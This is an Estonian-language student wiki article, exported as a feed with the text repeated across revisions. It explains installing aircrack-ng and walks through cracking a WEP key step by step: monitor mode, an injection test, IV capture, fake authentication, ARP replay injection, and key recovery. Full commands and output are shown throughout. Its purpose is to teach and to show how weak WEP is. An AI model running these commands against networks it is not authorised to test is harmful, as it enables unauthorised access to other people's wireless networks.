Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89337</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89337"/>
		<updated>2015-05-25T20:03:33Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Üldkirjeldus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
